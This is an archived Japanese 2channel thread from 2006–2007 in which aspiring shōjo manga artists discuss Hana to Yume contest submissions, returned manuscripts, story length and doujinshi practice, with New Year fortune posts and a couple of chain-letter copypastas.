誰か無知な漏れに教えてください・・・・。
今日BCに投稿した漫画が返却されてきたのですが
批評無しなのは普通なのですか?
特製原稿用紙と複製原画は来たのですが…
それから第49回のビックチャレンジ賞ていうのはもう結果は終わってるんですか?

229 :花と名無しさん:2006/12/28(木) 11:19:16 ID:???0
「漏れ」もなつかしいな

230 :202:2006/12/28(木) 13:00:36 ID:???0
>>203から>>210あたり
亀だけどレスサンクス
関東の人もダサイと思うんだね。なんか安心した。
そういえばあいのりでブクローが笑われてたの思い出したよ。
てわけでなるべく使わないよう努力します。


231 :花と名無しさん:2006/12/28(木) 14:00:25 ID:???O
>>228
24号で発表済みなわけだが…
そう言えば上位20名には批評シートを付けると銘うってたあれはどうなったのだろうか
自分も返却されたけど、特に何もついていませんでした、と。

232 :花と名無しさん:2006/12/28(木) 15:00:09 ID:???0
>>224
私は読んでて胸に来た。
子供の理想を総合すると漫画の主人公になるんだね。
美人で完璧な親、優しいお兄さんにお姉さん、可愛い妹分に弟分、お姫様扱い
欲しいものをなんでも持ってて何度羨ましいと思った事か…

>>217
学生時代、一人っ子のクラスメートって
交友関係に積極的な子が多かったんだが
今思えば兄弟がいない寂しさの反動だったのかもしれない。
211は他人を分かったふりして自分から目を背けてるだけだね。

233 :花と名無しさん:2006/12/28(木) 15:33:31 ID:???0
>>231
得点か何かはついてきました?
自分は上に書いたように特製原稿用紙と複製原画は来たのですが…

24号・・・
自分は昔この漫画をHMCに出したつもりだったので
次の号で見たときに名前が載ってなくそれから買うことを忘れてたので・・・
過去の号で貰うことってできますかね・・?
自分が何のクラスか知りたいのですが・・・

234 :花と名無しさん:2006/12/28(木) 16:56:26 ID:???0
BCにクラスなんてないよ。
受賞か否かだけ。名前載るのは受賞者と選外佳作までだった気がする。

235 :花と名無しさん:2006/12/28(木) 17:09:03 ID:???0
男性視聴者が多いアニメの続編で昔の少女漫画のような展開をやってた。
評判悪いだろうなと思ったら結構評判いいみたいで驚いた。
王道少女漫画展開が新鮮に感じる時期なのかな…
服も定期的に80年代物が流行ったりするよね。カチューシャとか。

236 :花と名無しさん:2006/12/28(木) 17:22:31 ID:???0
>>234
そうですか…ありがとうございます。
自分の返却には受賞という言葉は乗っていなかったのですが・・・。
どこかのサイトでBCの結果が載ってるところとかありませんでしょうか・・・?

237 :花と名無しさん:2006/12/28(木) 17:30:03 ID:???0
いい加減自分で調べろ

238 :花と名無しさん:2006/12/28(木) 17:33:00 ID:???0
>>235
昔の展開が許されても流石に絵柄まで古かったら
多分だめだったろうね。アニメでも漫画でも

239 :花と名無しさん:2006/12/28(木) 17:36:27 ID:???O
>236
何もついてなかったならBCの結果みても意味ないと思うんだけど

240 :花と名無しさん:2006/12/28(木) 18:11:26 ID:???0
>>236
今になって何も連絡ないなら
選外に決まってる。
もう受賞作品が掲載されてるのに。
どうしても結果を知りたいなら
古本屋とかオクとかで受賞発表号を探すか
編集部に問い合わせてみるしかないと思う。

241 :花と名無しさん:2006/12/28(木) 18:21:29 ID:???0
>>236
出しておいて発表の号を見てないなんて…。

とりあえず、BCの発表の仕方や批評についてはどの号の花ゆめでも載ってるから
読め?
ちなみにどの発売の号で発表なるかも載ってるから。
今回のBC発表号は読まなくてもよし。
読んでもあなたの投稿作に関する情報は何もないから。
もし、受賞した人が誰か、作品は何かまで知りたいなら
今発売中のザ花に受賞者何人かの作品が掲載されてるからそれを読め。
…まあ文読んでると他人の作品まで手が回らなさそうだけど…。


242 :花と名無しさん:2006/12/29(金) 11:23:30 ID:???0
BCレス関係者の皆様有難うございます。

とりあえず結果は見ました、皆様 ご協力有難うございます。
>>241の言うとおり他人の作品まで手は回りそうにはなりませんが
一応参考として調べは付きました。
折り入ってお礼申し上げます。

243 :花と名無しさん:2006/12/29(金) 20:53:38 ID:???O
ヒロインが18、19歳くらいの話を考えてるんだけど花夢には老け過ぎかな?(´・ω・`)


244 :花と名無しさん:2006/12/29(金) 20:59:30 ID:???O
私は花では16才、ララでは18才くらいをヒロインにするかも

245 :花と名無しさん:2006/12/29(金) 21:24:23 ID:???0
18くらいまでならギリギリありかも。
(高校生という意味で)
いきなり19歳はちょっと大人すぎかも。
大学生相当の年齢となってしまうと
花夢読者には遠い存在ぽい。
特に必然性なければ17くらいでいいのでは。

246 :花と名無しさん:2006/12/29(金) 22:33:55 ID:???0
ちょっと前のララなら普通にありだったんだけどね、大学生。
今はどうなんだろう。ララデラなら確実にいけると思うけど本誌はなあ…

247 :243:2006/12/30(土) 14:50:27 ID:???O
>>244->>246
ありがとう参考にする。
うーん雑誌変更も考えようかなあ・・・
花夢好きなんだけど

248 :花と名無しさん:2007/01/01(月) 02:07:08 ID:???O
明けましておめでとうございます(^ω^)


今年こそは…!!!

249 : 【大凶】 【1165円】 :2007/01/01(月) 02:11:59 ID:???0
あけましておめでとう御座います。
今年こそはどうにかなりたいです漫画の神様w

250 : 【大吉】 【385円】 :2007/01/01(月) 04:20:28 ID:yrBNLp8yO
>>249
大凶か…

251 : 【凶】 【761円】 :2007/01/01(月) 08:54:22 ID:???O
今年も頑張るどーーー!!!!!

252 :251:2007/01/01(月) 08:56:05 ID:???O
………orz

253 : 【だん吉】 【1466円】 :2007/01/01(月) 10:52:36 ID:???O
こ、こわい…(^ω^;)がむばる!

254 : 【小吉】 【546円】 :2007/01/01(月) 11:51:12 ID:???O
あけましておめでとうございます
今年こそは夢掴めるように頑張ります。

255 : 【大凶】 :2007/01/01(月) 13:21:32 ID:iVPDT4xC0
出来てる?

256 : 【末吉】 【325円】 :2007/01/01(月) 15:23:04 ID:???O
↑何が?
運勢なら出てるよ;;

つか皆、運悪すぎ;
でもお互い頑張りましょう…

257 : 【中吉】 【1687円】 :2007/01/01(月) 15:26:15 ID:???0
あけましておめでとう。
いい運勢が出るといいな。投稿もせめてペース作れるように頑張ろう。

258 : 【凶】 【1793円】 :2007/01/01(月) 15:45:07 ID:???0
あけおめ
早くこのスレから巣立ちたいもんだ

259 : 【大吉】 :2007/01/01(月) 17:39:09 ID:???O
おめでとー!
去年のこのスレで大吉だったからかいい成績とれたよ!
今年もどうかー……

260 : 【小吉】 :2007/01/01(月) 17:43:13 ID:???0
うおりゃ!

261 : 【豚】 【519円】 :2007/01/01(月) 19:06:09 ID:???O
ドリームキャッチャー!!!!!!

262 : 【小吉】 :2007/01/01(月) 21:21:46 ID:???0
今年こそスレから巣立つぞ!

263 : 【末吉】 【833円】 :2007/01/01(月) 23:50:20 ID:???0
元日が終わってしまう

264 :花と名無しさん:2007/01/03(水) 00:25:29 ID:???0
無責任に『続けろ』とも『止めろ』とも言えないけど、
ただ皆、悔いの無いようにがんばってください。

このスレのみんなに捧げます。
http://www.youtube.com/watch?v=4YDml9sgkDQ
(私がうpしたわけじゃないけど)

私は何年か前に挫折したけど悔いは無いよ。

265 :花と名無しさん:2007/01/03(水) 00:35:35 ID:???0
>>264
ただの「みんなのうた」だけど、これが何だっていうのだろう。

266 :花と名無しさん:2007/01/03(水) 02:11:25 ID:???0
結局HMC本名公開の刑はミスだったんだよね?
謝罪北?
つーか、ミスでなくこれからはその方針なの?(((( ;゚Д゚)))ガクガクブルブル   
流石にそれはないよね?

267 :花と名無しさん:2007/01/03(水) 13:42:32 ID:???0
そんなんマジ辞めてくれ。
そんな発表形態の雑誌見た事ないよ。
もし次も本名だったら電話で方針について問い合わせる。

268 :花と名無しさん:2007/01/03(水) 17:24:05 ID:???0
心配で投稿できないよww
いやネームが進まないだけなんだけどさ…

あれはミスじゃなきゃおかしい
次が本名だったら呆れちゃうよ

269 :花と名無しさん:2007/01/04(木) 02:48:32 ID:???0
ドキドキだね!

270 :花と名無しさん:2007/01/04(木) 12:28:22 ID:???0
○。・。○。・。○。・。○。・。○。・。○。・。○。・。○。・。○
このレスをみたあなたは・・・3日から7日に ラッキーなことが起きるでしょう。
片思いの人と両思いになったり 成績や順位が上ったりetc...
でもこのレスをコピペして別々のスレに 5個貼り付けてください。
貼り付けなかったら今あなたが1番起きて ほしくないことが起きてしまうでしょう。
コピペするかしないかはあなた次第...
○。・。○。・。○。・。○。・。○。・。○。・。○。・。○。・。○

271 :花と名無しさん:2007/01/04(木) 13:37:57 ID:???0
謝罪あったよ

※前号の第372回HMCの選外の発表において、一部、表記上の
誤りがありました。前回、ご投稿された皆様に深くお詫び申し上げます。

272 :花と名無しさん:2007/01/04(木) 20:59:44 ID:???0
>選外の発表において、一部表記上の誤り

選外の一部じゃなくて全部だよねw

273 :花と名無しさん:2007/01/05(金) 15:48:16 ID:???O
いやいやw
選外の一部じゃなくて、名前を本名にしてしまったという意味での
一部って意味だと思うぞ
選外に関する表記すべてが間違いだった訳ではないから…という
あ、着いた。今から資料探してくる

274 :花と名無しさん:2007/01/06(土) 04:53:52 ID:???0
具体的に「誤って本名を載せてしまいました」って書かれなくて良かった

275 :花と名無しさん:2007/01/06(土) 06:53:38 ID:???0
さらに追い討ちをかけるようなもんだもんねぇw

276 :花と名無しさん:2007/01/06(土) 07:11:27 ID:???O
本名っていうなー!

277 :花と名無しさん:2007/01/09(火) 00:52:36 ID:???0
アリの巣コロリってあるじゃん。
蟻の行列にポンと置くと、一瞬ビックリして列が乱れる。
邪魔だなと言わんばかりに迂回する列が出来る。
そのうち好奇心旺盛な一匹がアリの巣コロリに入る。
そいつをマネして何匹も入る。
毒とも知らずにツブツブを運び出す。
一匹が一粒づつ。
いつのまにか行列はアリの巣コロリが折り返し地点になる。
黄色い粒と黒い蟻が作り出す模様は綺麗で見てて楽しい。
一匹が一粒づつ、丁寧にせっせと毒の粒を運ぶ。
せっせと、せっせと、せっせと、せっせと。
蟻さんって働き者だなと思う。
次の日、あれほど沢山いて俺を困らせた蟻が一匹もいない。
ほんとにいない。
探してもいない。
泣きたくなった。




このレスを見た人は4日後にあなたの大切な人がいなくなるでしょう・・・・
それが嫌ならこのレスを5つの板にコピペしてください。
信じるか信じないかはあなた次第です。

278 :花と名無しさん:2007/01/09(火) 04:24:15 ID:???O
>>277
懐かしいコピペだね…

279 :花と名無しさん:2007/01/09(火) 12:42:52 ID:???O
でもsage進を守ってるあたりやさしい人なんだね…


クマー

280 :花と名無しさん:2007/01/09(火) 20:32:56 ID:???0
あのさ、応募要項の本誌投稿経験って
HMCに3回投稿してからBCに出すとしたら
『4回目』になるのかな?
そんでまたHMCに出したら5回目?
それともHMCとBCは別々に数えるの?

281 :花と名無しさん:2007/01/10(水) 11:02:27 ID:???O
それぞれの賞ごとの回数でいいと思うよ。

ところでみんな同人活動してる?
してない人はどう思う?
漫画の練習になるからやろうと思うんだけど。

282 :花と名無しさん:2007/01/10(水) 13:47:10 ID:???O
>281
お金かかるわりにあまり練習にはならなかった気がする
パロ同人だからかもだけど絵に変な癖もついて大変だった

それより会員制サークル(漫研みたいなの)の会報で毎月オリジナル漫画描いてたのが
かなり練習になったよ
他の会員の人から感想貰えてやる気続いて、気付けば年間300枚以上描いてた
最初に比べると絵はかなり上手くなったよ
元がかなり下手だったんだけどね

283 :花と名無しさん:2007/01/10(水) 15:26:36 ID:???O
同人は同人で売れる絵があるし、商業で求められる絵とは違うから
やめた方がいいかも…
スクエニならまだしも白線では受け入れられ難くなる気が。
同人はすぐ読者の反応もらえるから楽しいけど抜け出せなくなるし

284 :花と名無しさん:2007/01/10(水) 15:46:17 ID:???0
>>283
同人なんて絵柄もジャンルもなんでもありだよ?
同人やったから白線で受け入れられなくなったなんてありえない

あと同人はとんでもなくお金がかかる趣味と覚えておいた方がいい

285 :花と名無しさん:2007/01/10(水) 16:21:24 ID:???O
>>281
自分も便乗して…
もう三年位投稿してなかったんですが、過去(小・中・高生の時)投稿した過去を消したい勢いで…初投稿にしてもわからないですよね?
所詮選外だったから覚えてるわけもないでしょうが、気になってしまって。

教えてチャンですみませんorz

286 :花と名無しさん:2007/01/10(水) 18:25:23 ID:???O
>>284
まあジャンルによっても違うが。私は少年誌パロで活動してたから
そう思うのかもな。同人のメインイメージはASUKA〜BL雑誌系列
オリジナルだとまた違うんだろうけど

287 :花と名無しさん:2007/01/10(水) 20:58:51 ID:???0
>>281
あれは練習のためとかにするもんじゃないぞ。。
自分は同人やってたけど、それは好きだったからであって
好きなジャンルがあったりとか、オリジ同人でしか描けないものを描きたいとか
そういう目的がないなら敢えてする必要はない。

自分は、やってなかった頃より漫画と絵はかなり上達したと実感できるけど
やれば必ず上達するってもんでもないし。

288 :花と名無しさん:2007/01/10(水) 21:56:05 ID:???0
花夢の特製原稿用紙貰ったんだけど
他社で使っちゃいけないのかな・・・?
タチキリ線が市販と違うのだが

289 :花と名無しさん:2007/01/10(水) 22:34:37 ID:???O
使っても構わない。但し編集の心証は下がる。
でも漫画が良ければ関係なく賞とれる。

そういうことでしょう

290 :花と名無しさん:2007/01/11(木) 00:36:27 ID:???0
自分の定番の原稿用紙があるから貰っても困る
実際使って投稿している人ってどのくらいいるんだろうね

291 :花と名無しさん:2007/01/11(木) 02:32:56 ID:???0
どうせだったら原稿用紙代金分のネーム用紙かトーン欲しい…
同じく定番の原稿用紙あるから使わない。

292 :花と名無しさん:2007/01/11(木) 02:41:22 ID:???0
ネーム用紙いいね
紙質とかロゴとかあんまり気にならないし
原稿用紙は練習用には使うけど投稿には使わないもんなあ…

293 :花と名無しさん:2007/01/11(木) 06:19:06 ID:???0
冬休みだったから今月出す人多そうだ。
でも出すぞ(`・ω・´)

294 :花と名無しさん:2007/01/11(木) 09:58:09 ID:???O
ってことはもう完成したんだね。乙!!良い結果が出るといいね

295 :花と名無しさん:2007/01/11(木) 11:47:49 ID:???0
ここの人たちでデジタルで投稿してる人いる?


296 :花と名無しさん:2007/01/11(木) 14:12:37 ID:???0
自分はこれからしようと思ってる

297 :花と名無しさん:2007/01/11(木) 16:49:43 ID:???0
トーンでもネーム用紙でもないのは、無駄になると勿体無い心理使って次回も投稿させるためだよね
原稿用紙なんていらないのに

298 :花と名無しさん:2007/01/11(木) 18:50:52 ID:???0
一度に大量に刷れて粗品としては安いからかもね
ホントいらないんだけど

299 :花と名無しさん:2007/01/11(木) 19:43:18 ID:???O
うはwみんなそう言わずに使ってやれよw
編集の印象もよくなるだろ

知らんけど

300 :花と名無しさん:2007/01/11(木) 21:00:41 ID:???O
そんなのでよくなるはずがないw

301 :花と名無しさん:2007/01/12(金) 14:23:40 ID:???O
このスレにいた人でデブーした人っているのかな…?
あぁ、手が進まない

302 :花と名無しさん:2007/01/12(金) 21:21:02 ID:???O
連スマソ
2ch閉鎖なのかな?
ここなくなるの寂しいお(´;ω;`)

303 :花と名無しさん:2007/01/12(金) 22:53:38 ID:???O
むしろ2ちゃんやってた時間を漫画に費やせられるから良いかも

304 :花と名無しさん:2007/01/12(金) 23:28:45 ID:???O
同じこと書き込もうとしてた>2ch閉鎖
あと二日だっけ。避難場所つくる…?
周りに志望者がいないから、どんな小さなことでも話し合える
だけどライバルっていうみんなが好きなんだが

ない方がむしろいいのだろうか…

305 :花と名無しさん:2007/01/12(金) 23:43:38 ID:???0
避難所作るとしたらしたらばの
投稿関係の板にお世話になるのかな?
それとも少女漫画板全体の非難板あるのか?

306 :花と名無しさん:2007/01/13(土) 00:24:16 ID:???0
投稿者匿名交流はなくなると寂しい
でも、なんか差し押さえ無理っぽいからひとまず安心
本年もよろすく(遅っw)

307 :花と名無しさん:2007/01/13(土) 00:29:24 ID:???0
え?
結局ネタなんじゃないの?

308 :花と名無しさん:2007/01/13(土) 00:30:37 ID:???0
>>306
しまった…リロってなかった
差し押さえは無理っぽいよね
本年もよろしくw

309 :花と名無しさん:2007/01/14(日) 00:38:06 ID:7fy+cSw+0
白泉系は投稿したら、必ず名前載るの?

310 :花と名無しさん:2007/01/14(日) 01:41:25 ID:???0
投稿する賞による

311 :花と名無しさん:2007/01/14(日) 23:45:32 ID:???0
>>309
HMCは本名晒し上げの刑だよ!ヾ(▽⌒*)キャハハハo(_ _)ノ彡_☆バンバン!!

312 :花と名無しさん:2007/01/15(月) 10:26:54 ID:???0
まったく関係ないんだけどさ、
ペン握ってよく描いた日って、ペン握ってた方の指の感覚鈍くならない?

313 :花と名無しさん:2007/01/15(月) 12:44:42 ID:???O
ちょw関係なさすぎてワロスw
しかも私はならない

314 :花と名無しさん:2007/01/15(月) 15:32:59 ID:???O
ならない
ペンタコの少し上が赤くなって痛いのはある
力入れ過ぎかな

315 :花と名無しさん:2007/01/15(月) 16:00:46 ID:???0
なるかも…
私の場合はだいたいネームに一番時間かけて、制作自体は20P以内なら
3日くらいで仕上げまであげる。普段から会社で一般企業相手のイラストを
作成してるので絵書くの自体はもともと早いってこともあるんだけど
一日で全ページをペン入れし終えるとさすがに手がびりびりする。肩も死ぬ…

316 :花と名無しさん:2007/01/15(月) 20:44:02 ID:???0
>315
すごい…どうやったらそんな芸当ができるんだ
いいなぁ
私はどんなに頑張っても作画はページ数と同じ日数は掛かってしまう
私が遅いのか orz

>312
なるよ 人差し指に力が入っているらしくそこだけ感覚鈍くなる感じ

317 :花と名無しさん:2007/01/15(月) 21:45:34 ID:???O
>>312はあちこちにマルチして結局、求める答えは得られたんだろうか

318 :花と名無しさん:2007/01/17(水) 23:53:34 ID:???O
今更だけどストーリー漫画を16ページに収めるのが大変なんだが・・・。
表紙除くと実質10Pだし。
出来ない事はないからエピソード省いて省いて大事な所だけ残してるけど、
それで本当に面白いのかと思う。
勿論ダラダラ長いのは勿論問題だし、その構成力で実力が問われるんだろうけどさ

319 :花と名無しさん:2007/01/17(水) 23:54:35 ID:???O
↑間違った。実質15P

320 :花と名無しさん:2007/01/18(木) 00:21:28 ID:???O
なんか地味にキタw〈10P

面白い16Pはいっぱいある
でも無理してそこに近付こうとするより大して面白くできなくても
こじんまり教科書的にまとめてそこにひとつまみあなたの個性を…って感じ?


321 :花と名無しさん:2007/01/18(木) 01:28:39 ID:???0
「16Pで大作は期待してない」っていう花の編集長が
何かのインタビューで答えていたよ。
何年か前の話だから編集長変わったかもしれないけど。

322 :花と名無しさん:2007/01/18(木) 02:51:50 ID:???0
>>318
ページ数に見合った話の内容ってのは絶対あるから、
「自分はここを描きたい、ここは譲れない」って点を
どうしても削らなきゃならないような話だったら、
それは長編部門に回せばいい。

16Pなりのシンプルなストーリーでいいと思う。
逆に詰め込みすぎてるのよりシンプルで、
ぐっとくる箇所が1つドン!とある方がインパクト強いし。

323 :花と名無しさん:2007/01/18(木) 03:37:04 ID:???O
逆に、絶対描きたい後半のシーンへと至るまでの展開が
あまりにも急ぎすぎor説明不足で説得力に欠けるようなら
そういうのも長編向きかもね

特に必要ない展開で冗長になってるだけなら、潔くバッサリ切って
16Pに収めた方が凝縮されるぶん印象が強くなって吉だろうけど

324 :318:2007/01/18(木) 10:33:03 ID:???O
>>320->>323
ストーリーの面白さよりその人の個性を見てるのかな。
ありがとう。やる気出てきた

325 :花と名無しさん:2007/01/18(木) 23:27:26 ID:???0
基礎力でしょ

326 :花と名無しさん:2007/01/19(金) 09:20:46 ID:???O
>>325
まぁぶっちゃけその一言につきるよね
>>324
個性は大事だけど、別に重要な要素に順番があるわけではなくて
画力、構成力、演出力、独自性などを総合的に
期待値も含めて見られてるかと…
ストーリー(構成力)は平凡なものの見せ方(演出力)が抜群とか
画面構成は要勉強だけど絵柄が物凄く華やかで描線もキレイとか

ただ、マイナスを補ってあまりあるプラスがどこかにあれば
結果として総合評価が上がる可能性はあるから
自信ない部分の向上努力は大前提として、自信ある部分を積極的に売り込むという意味なら
個性とか一点に絞って特別熱心に力をいれるのもアリなのでは

327 :花と名無しさん:2007/01/20(土) 12:50:42 ID:???0
今号、初投稿で優秀賞の人いたね

328 :花と名無しさん:2007/01/21(日) 15:47:56 ID:???O
なんか昨日繋がらなかったのは私だけか…?
サーバー落ち?って画面しかでなくて、まさか2chが部分落ち
したのかと思った…

329 :花と名無しさん:2007/01/21(日) 16:49:05 ID:???0
運営板見たら?
自分も先日の話題の、2ちゃん差し押さえが現実化したのかと思ったけど。

330 :花と名無しさん:2007/01/21(日) 23:59:39 ID:???O
>>328
鯖接続関係でおや?と思うことに遭遇したら運営板見るクセつけた方がいい
同じ状況の人が他にもいるか確認してみて、いないようなら
自分の携帯やアプリ側の問題ってことになる
そしたら関係スレで同様の人や解決法を探せばいいし

運営板含め全板・スレに繋がらないなら2ch全体の問題の可能性
通常サイトもダメなら携帯の不具合や、工事など利用キャリアの問題の可能性
というように、置かれた状況を調べる手立てはあるのだから
いくら過疎スレとはいえ、まったく関係ない鯖話で誘い受けする前に
まず事態把握の努力をして欲しいと感じた
…キツイ言い方だけど

331 :花と名無しさん:2007/01/22(月) 00:00:54 ID:???0
>>330
親切だな。自分なら質問スレ池ですましてる

332 :花と名無しさん:2007/01/22(月) 00:05:22 ID:???O
>>330自己レス
過疎は言いすぎだった、ごめん
書き込み終わるまで他スレと間違えちゃってた

333 :花と名無しさん:2007/01/22(月) 00:06:06 ID:???0
そこまで2見るのに必死になってる暇があったら原稿やれよ

334 :328:2007/01/22(月) 00:48:53 ID:???O
自分のせいで流れ悪くしてすまん。
普段2chにそこまでいないから、運営確かめるほど興味なかったんだ
呟きだったわけだがみんなの気持ちを逆撫でしてしまった

>>333
お前もな、と言いたいところだが真理か…
もうこのスレから離れよう…目的を見失うところだった


さよなら…みんな、いつか同じ雑誌で連載できるよう頑張ろうな

335 :花と名無しさん:2007/01/22(月) 01:04:18 ID:???O
花ゆめのネーム部門て、ジャンプのデスノみたいなのを狙ってんのかな。

原作つき大ヒットを

336 :花と名無しさん:2007/01/22(月) 02:37:03 ID:???0
少女漫画会には飴☆飴という見本がいるのにねえ。
やめておいた方がいいと思うんだけどなあ。分業は。

337 :花と名無しさん:2007/01/22(月) 02:59:57 ID:???0
>>335
氷室+山内の実績ってのが一応あるからね〜白癬には。
デスノレベルの大ヒットではないけど、そこそこコミクスが売れたんでしょ。

338 :花と名無しさん:2007/01/22(月) 03:35:27 ID:???0
いや、原作つきと共同作成では違うんじゃないか?
ジャパは小説が先じゃなかったっけ?
ネームって微妙だよね。ギャラはどうなるんだろう?
絵を描く人が内容にまったく手を入れない、ということでやっていくんだろうか。
ふろくなんかのイラストの二次使用についても、もし売れれば売れただけ
難しくなるだろうし。

339 :花と名無しさん:2007/01/22(月) 03:42:16 ID:???0
ギャラは場合によって分担するでしょうな。
どこまで作画担当が手を入れていいかは、原作者と編集の意向しだいだろうし
作画が意見を出して、それがよければ採用されたりすることもあるだろう。

340 :花と名無しさん:2007/01/22(月) 12:00:18 ID:???0
デスノよりヒカ碁が先だ。

でも、両方とも小畑級の絵師じゃないとヒットしたか分からんね。
ユートは散々だったし

341 :花と名無しさん:2007/01/22(月) 12:01:52 ID:???0
>>338
小畑は構図いじったりしてるよ。

342 :花と名無しさん:2007/01/22(月) 12:35:37 ID:???0
てか出す人どれくらいいるんだろうか。
自分も出そうと思ったけど、やっぱりなりたいのは原作者じゃなく
漫画家だから、漫画の方を優先させてやめたよ。

343 :花と名無しさん:2007/01/22(月) 13:26:15 ID:???0
よっぽど普段の投稿で話は好評価ってぐらいのレベルじゃないと
受賞には届かないと思う。本当は作画もやりたくて(=漫画家希望で)
変に好奇心だけで今回応募してもし受賞したら
後々やっぱり絵が描きたいとなっても編集に迷惑かけたり
色々大変な目に合うだろうから出すなら一応
その辺のリスクもある程度考えて出した方がいいと思う。

344 :花と名無しさん:2007/01/22(月) 13:40:31 ID:???0
まだ試験的な感じもするね。ジャンプですら
たまに掲載ランクの受賞該当者無しって時あるし
そんな簡単にポンポン受賞者出さないだろうなとは思うけど。
>>342ー343
禿同。今はネームだけで良くてもやっぱ根底にあるのは
漫画家志望だからそのうち絵を描きたいってなるのがわかる。
自分で作画やっとけば良かったって後悔する前に出すのやめとくよ。

345 :花と名無しさん:2007/01/22(月) 13:54:01 ID:???0
心配しなくても選ばれないから大丈夫

346 :花と名無しさん:2007/01/22(月) 14:22:26 ID:???0
応募時の心持ちの話じゃん

347 :花と名無しさん:2007/01/22(月) 14:45:02 ID:???0
まぁ結果はどうあれ中途半端な気持ちで
出さない方がいいって事だね。

それより新しい部門増やすよりもアテナを年2回にするとか
BCを年3回にとかにしてくれた方が嬉しかった。

348 :花と名無しさん:2007/01/22(月) 15:38:26 ID:???0
でも年3回だと1年で出るデビュー人数が
1.5倍になるしその後の掲載競争凄そうだね。
ララのLMG見てると月刊で掲載枠少ないのに年3回ごとに
デビュー者数人出してて凄いなと思う。

349 :花と名無しさん:2007/01/22(月) 16:55:24 ID:???O
小説書きに転向した自分はちと興味がある。

350 :花と名無しさん:2007/01/22(月) 18:43:02 ID:???0
昔、原作を募集してプロ作家が漫画にしてたらしいね
遙か1巻に確か載ってたと思うけど、これ1作きりだったのかな
でも今回は原作(小説?)ではなくネームってあたりが・・・
白癬の場合、いいネームが作れれば絵が多少アレでもデビュー
出来ると思うんだけど

というかこの前のアテナ大賞のことを考えると、多少受賞レベル
じゃなくてもいくつか入賞させる気がする

351 :花と名無しさん:2007/01/23(火) 19:22:30 ID:???0
吉井凛 トレースパクリ クッキー集英社より
http://p.pita.st/?m=hmbvestv
↓左、ロゴにあわせたほうに注目
http://p.pita.st/?1zaxc8e6
606 :花と名無しさん :2007/01/23(火) 18:04:22 ID:???0
>>594
一枚目の奴、ロゴが!!! ロゴがそのまんまや〜〜〜!!!
こりゃ言い訳できんね。

92 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)